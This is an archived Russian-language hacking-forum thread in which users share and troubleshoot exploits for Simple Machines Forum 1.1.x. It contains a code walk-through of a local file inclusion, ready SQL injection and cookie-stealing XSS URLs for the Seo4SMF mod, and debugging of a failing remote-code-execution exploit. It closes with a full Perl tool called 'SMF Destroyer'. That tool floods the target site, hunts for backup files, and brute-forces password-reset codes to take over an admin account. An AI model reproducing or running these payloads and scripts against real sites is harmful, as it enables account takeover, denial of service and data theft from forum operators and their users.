ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.11.2008, 16:31
|
|
Познающий
Регистрация: 31.01.2008
Сообщений: 46
Провел на форуме:
124111
Репутация:
8
|
|
[QUOTE='[Raz0r]']Simple Machines Forum (SMF) 1.1.6 Remote Code Execution Exploit
http://milw0rm.com/exploits/6993
[QUOTE]
На данный момент, эксплойт размешенный по http://milw0rm.com/exploits/6993 не доработанный, рабочий находится по адресу: _http://real.olympe-network.com/releases/19817
|
|
|
07.11.2008, 20:46
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Simple Machines Forum <= 1.1.6 Code Execution (LFI)
Автор:~elmysterio ( a.k.a us )
Локальный инклуд раннее загруженного атачмента с расширением .gif, содержащим шелл
http://milw0rm.com/exploits/7011
|
|
|
|
08.11.2008, 18:58
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
SMF <= 1.1.6 Karma Description Mod XSS
Код:
<script>alert(/XSS/)</script>
Автор: mailbrush (Я)
Не фильтрируется поле "За что" в моде кармы.
Последний раз редактировалось mailbrush; 21.11.2008 в 12:02..
|
|
|
|
11.11.2008, 20:26
|
|
Новичок
Регистрация: 06.12.2005
Сообщений: 4
Провел на форуме:
14509
Репутация:
0
|
|
нехтит 
# Logged in as yaotzin
# Waiting 5 secs (flood control)
PHP Notice: Use of undefined constant frmdt_filename - assumed 'frmdt_filename'
in D:\PHP\php5.2.6\exploit.php on line 310
PHP Notice: Use of undefined constant frmdt_type - assumed 'frmdt_type' in D:\P
HP\php5.2.6\exploit.php on line 311
PHP Notice: Use of undefined constant frmdt_content - assumed 'frmdt_content' i
n D:\PHP\php5.2.6\exploit.php on line 312
PHP Notice: Use of undefined constant frmdt_url - assumed 'frmdt_url' in D:\PHP
\php5.2.6\exploit.php on line 1263
PHP Notice: Use of undefined constant frmdt_boundary - assumed 'frmdt_boundary'
in D:\PHP\php5.2.6\exploit.php on line 1267
PHP Notice: Use of undefined constant frmdt_filename - assumed 'frmdt_filename'
in D:\PHP\php5.2.6\exploit.php on line 1285
PHP Notice: Use of undefined constant frmdt_type - assumed 'frmdt_type' in D:\P
HP\php5.2.6\exploit.php on line 1287
PHP Notice: Use of undefined constant frmdt_type - assumed 'frmdt_type' in D:\P
HP\php5.2.6\exploit.php on line 1288
PHP Notice: Use of undefined constant frmdt_transfert - assumed 'frmdt_transfer
t' in D:\PHP\php5.2.6\exploit.php on line 1290
PHP Notice: Use of undefined constant frmdt_content - assumed 'frmdt_content' i
n D:\PHP\php5.2.6\exploit.php on line 1293
# Error while posting
# Try augmenting -wait parameter
#
D:\PHP\php5.2.6>
|
|
|
|
12.11.2008, 05:38
|
|
Познающий
Регистрация: 31.01.2008
Сообщений: 46
Провел на форуме:
124111
Репутация:
8
|
|
to yaotzin
в рнр.ini
error_reporting = E_ALL & ~E_NOTICE
запускать сплойт с параметром -wait 10
|
|
|
|
12.11.2008, 05:56
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Цель: Simple Machines Forum (SMF) 1.1.6 и более ранние версии
Воздействие: Выполнение произвольных команд
Код эксплоита: http://www.securitylab.ru/bitrix/exturl.php?goto=%2Fpoc%2Fextra%2F362535.php
|
|
|
|
13.11.2008, 00:31
|
|
Новичок
Регистрация: 14.09.2006
Сообщений: 17
Провел на форуме:
96999
Репутация:
0
|
|
Сообщение от Nightmarе
Цель: Simple Machines Forum (SMF) 1.1.6 и более ранние версии
Воздействие: Выполнение произвольных команд
Код эксплоита: http://www.securitylab.ru/bitrix/exturl.php?goto=%2Fpoc%2Fextra%2F362535.php
Не работает =(
[!!] Wrong username/password
юзер валидный но всеравно не работает (
Последний раз редактировалось piton; 13.11.2008 в 00:35..
|
|
|
|
04.01.2009, 01:07
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
http://milw0rm.com/exploits/7011
СМФ имеет функцию изменения тем,так вот это уязвимость заключается в изменении настроек тем,а затем присвоения значение $ параметрам конфигурации,так что вы можете изменять настройки смф
Итак:
Sources/Themes.php
249 в index.php:
Код:
'jsoption' => array('Themes.php', 'SetJavaScript')
1185 в Sources/Themes.php
Код:
function SetJavaScript()
Затем эта функция выделяет темы в таблице переменных, которые вы послали
1205 в Sources/Themes.php
Код:
db_query("
REPLACE INTO {$db_prefix}themes
(ID_THEME, ID_MEMBER, variable, value)
VALUES ($settings[theme_id], $ID_MEMBER, SUBSTRING('$_GET[var]', 1, 255), SUBSTRING('" . (is_array($_GET['val']) ? implode(',', $_GET['val']) : $_GET['val']) . "', 1, 65534))", __FILE__, __LINE__);
Зaтем считывает одну и ту же инфу тем же методом:
Код:
$request = db_query("
SELECT ID_THEME, variable, value
FROM {$db_prefix}themes
WHERE variable IN ('name', 'theme_url', 'theme_dir', 'images_url')" . (empty($modSettings['theme_default']) && !allowedTo('admin_forum') ? "
AND ID_THEME IN ('$knownThemes')
AND ID_THEME != 1" : '') . "
AND ID_THEME != 0
LIMIT " . count(explode(',', $modSettings['knownThemes'])) * 8, __FILE__, __LINE__);
861 в Sources/Themes.php
Код:
while ($row = mysql_fetch_assoc($request))
Параметры в $context['available_themes'][TEMA]
869 в Sources/Themes.php
Код:
$context['available_themes'][$row['ID_THEME']][$row['variable']] = $row['value'];
Затем принимает информацию по пунктам:
904 в Sources/Themes.php
Код:
foreach ($context['available_themes'] as $ID_THEME => $theme_data)
И в настройки перменные принимают значения,который мы только что изменили
910 в Sources/Themes.php
Код:
$settings = $theme_data;
И в конце концов, в том числе файл, использует значение $ theme_dir
Код:
include($settings['theme_dir'] . '/languages/Settings.' . $user_info['language'] . '.php')
|
|
|
|
09.01.2009, 21:49
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
Уязвимости в модуле Seo4SMF
SQL Иньекции:
Файл: seo4smf-redirect.php
Куски уязвимого кода:
Line 7-13
Код:
$topic = $_GET['t'];
$board = $_GET['b'];
$other = $_GET['o'];
$user = $_GET['u'];
$tpage = $_GET['p'];
$action = $_GET['a'];
$param = $_GET['param'];
Line 50-63
Код:
$query = db_query("
SELECT m.ID_TOPIC, m.subject ,b.ID_BOARD, b.name
FROM {$db_prefix}messages AS m, {$db_prefix}boards AS b
WHERE m.ID_TOPIC = $topic
AND m.ID_BOARD = b.ID_BOARD
IMIT 1", __FILE__, __LINE__);
Line 105-108
Код:
$query = db_query("
SELECT name FROM {$db_prefix}boards AS b
WHERE ID_BOARD = $board
LIMIT 1", __FILE__, __LINE__);
Line 125
Код:
$request = db_query("SELECT memberName FROM {$db_prefix}members where
ID_MEMBER=".$user." limit 1", __FILE__, __LINE__);
Line 143
Код:
$request = db_query("SELECT subject FROM {$db_prefix}tp_articles where
id=".$tpage." limit 1", __FILE__, __LINE__);
Переменные не содержат никакие фильтры,поэтому можно провести Sql иньекцию.
Код:
http://site/smf/seo4smf-redirect.php?t=-1 union select 1,2,3...,concat(username(),database()) –
XSS:
Файл: seo4smf-redirect.php
Кусок уязвимого кода:
Код:
if(!empty($url)){
header('HTTP/1.1 301 Moved Permanently');
header('Location: '.$url);
exit;
}
Код:
http://site/seo4smf-redirect.php?a=x%0DLocation:%20javascript:alert(document.cookie);
Последний раз редактировалось baltazar; 28.01.2009 в 17:58..
|
|
|
|
23.01.2009, 14:30
|
|
Познающий
Регистрация: 10.08.2008
Сообщений: 78
Провел на форуме:
235218
Репутация:
46
|
|
покапавшись на днях в интернете наткнулся на такой exploit для SMF 1.1.7 тут www.securitylab.ru
Код:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Std;
use LWP::Simple;
use HTTP::Request;
#Author: Xianur0
#Uxmal666[at]gmail.com
# Cracks links Password Recovery
# Find Temporary Files executed by mods
# DB function Flood by Error Log
# File Path Disclosure
# List installed Mods (Useful To Find Mods Vulnerable)
# etc. ..
print "\n\n\x09\x09\x09\x09\x09SMF Destroyer 0.1 By Xianur0 [Priv8]\n\n";
my $url = $ARGV[1] || die ("Use: smf.pl [option] [Full URL]
[Proxy:Puerto]\nOptions:\n-f Flood \n-p Search Directory Setup \n-l
Installed Mods List \n-b Find Temporary\n-c Cracks links Password
Recovery (Recommended Use Proxy)");
version();
my $proxy = $ARGV[2] || "";
if($ARGV[0] ne "-c" && $proxy ne "") {
$ua->proxy(["http"], "http://".$proxy);
}
getopts('fplbc', \%opt);
crackeador() if $opt{c};
flood() if $opt{f};
path() if $opt{p};
list() if $opt{l};
temp() if $opt{b};
sub headers {
$req->header('Accept' => 'text/html');
$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3');
}
sub version {
$ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12)
Gecko/20080201 Firefox/2.0.0.12');
$req = HTTP::Request->new(GET => $url);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
if ($html =~ /title="Simple Machines Forum" target="_blank">Powered by
SMF (.*?)<\/a>/){
$version = $1;
print "\n[X] SMF Version: $version\n";
if($version < "1.1.7") {
print "\n[X] Outdated Version $version!!!!!!!!!!!\n\n[X]
http://milw0rm.com/search.php?dong=smf".$version."\n\n";
}
}}}
sub path {
$req = HTTP::Request->new(GET => $url.'/SSI.php?ssi_layers');
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
if ($html =~ /Undefined variable: ssi_layers in <b>(.*?)SSI.php/){
print "[X] Directory: $1\n";
} else { print "[!] Getting error Directory!\n";}
}
}
sub flood {
print "[X] Starting Flood! (Press Ctrl + C To Finish)\n";
$texto = "Flood!!!!!" x 15;
$req = HTTP::Request->new(GET =>
$url.'/index.php?action=help;page['.$texto.']=loginout');
&headers;
for($i = 1; $i<10000; $i++) {
$res = $ua->request($req);
if ($res->is_success) {
print "[-] Sent: ".$i."\n";
} else {
print "[!] HTTP Error Query: " . $res->status_line . "\n";
}
}
}
sub temp {
@temps=('index.php~','Settings.php~','Settings_bak.php~');
foreach $temp (@temps) {
$req = HTTP::Request->new(GET => $url."/".$temp);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
print "[X] Temporary File Found: ".$url."/".$temp."\n";
} else {print "[!] Not Found: ".$url."/".$temp."\n";}
}
}
sub list {
$req = HTTP::Request->new(GET => $url."/Packages/installed.list");
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
my @htmls = split("\n", $html);
foreach $mod (@htmls) {
my @mod = split('\|\^\|', $mod);
print "[X]Package:\nDescription: $mod[0]\nFile:
$url/Packages/$mod[1]\nName: $mod[2]\nVersion: $mod[3]\n\n";
}
}
}
sub crackeador() {
$url = $ARGV[0];
$nick = $ARGV[1];
$id = $ARGV[2] || die("Use: smf.pl -c [URL SMF] [Nick Admin] [ID
Admin] [Proxy:Puerto]\nExample: smf.pl -p
http://www.simplemachines.org/community/ dschwab9 179
www.carlosslim.com:3128\n");
my $reminder = $url."?action=reminder";
my $smf = $reminder.";sa=setpassword;u=".$id.";code=";
my $proxy = $ARGV[3];
if($proxy ne "") {
$ua->proxy(["http"], "http://".$proxy);
}
sub mail() {
my $content = HTTP::Request->new(GET => $reminder);
$contenedor = $ua->request($content)->as_string;
if ($contenedor =~ /Set-Cookie: (.*?)
/){
print "\n[+] SESSION Detected: $1\n";
$session = $1;
} else { die "[!] SESSION could not be found!\n";}
if ($contenedor =~ /<input type="hidden" name="sc" value="(.*?)"/){
print "\n[+] sc Detected: $1\n";
$sc = $1;
} else { die "[!] SC could not be found!\n";}
my $req = HTTP::Request->new(POST => $reminder.';sa=mail');
$req->content_type('application/x-www-form-urlencoded');
$req->content('user='.$nick.'&sc='.$sc.'&=enviar');
$req->header('Cookie' => $session);
my $res = $ua->request($req)->as_string;
if(!$res) {exit;}
print "[x]Sent!\n";
}
sub generador() {
my $password = "";
my @chars = split(" ",
"0 1 2 3 4 5 6 7 8 9 a b c d e
f g h i j k l m n o p q r s t
u v w x y z");
for (my $i=0; $i < 10 ;$i++) {
$_rand = int(rand 35);
$password .= $chars[$_rand];
}
return $password;
}
sub brute() {
while($bucle ne "finito") {
$code = generador();
my $fuente = $reminder.";sa=setpassword;u=".$id.";code=".$code;
my $content = HTTP::Request->new(GET => $reminder);
my $content = $ua->request($content)->as_string;
if ($content =~ /<input type="hidden" name="sc" value="(.*?)"/){
$sc = $1;
} else { die "[!] SC could not be found!\n";}
if ($content =~ /Set-Cookie: (.*?)
/){
print "\n[+] New SESSION Detected: $1\n";
$session = $1;
} else { die "[!] SESSION could not be found!\n";}
print "[+] Testing Code: ".$code."\n";
my $req = HTTP::Request->new(POST => $reminder.';sa=mail');
$req->content_type('application/x-www-form-urlencoded');
$req->content('passwrd1=xianur0washere&passwrd2=xianur0washere&code='.$code.'&u='.$id.'&sc='.$sc);
$req->header('Cookie' => $session);
$res = $ua->request($req);
if ($res->is_success) {
if($res->content =~ '<input type="text" name="user" size="20" value="') {
print "[-] Password Changed!\n[x] New password: xianur0washere\nUsername: $1\n";
exit;
}
} else { die "[!] HTTP response incorrect!\n";}}}
print "\n[-] Sending Mail...\n\n";
mail();
print "\n[-] Attacking code link recovery...\n";
brute();
}
Последний раз редактировалось AnOcToJI; 24.01.2009 в 16:59..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?931904){kind=avatar}
![Отправить сообщение для [Raz0r] с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
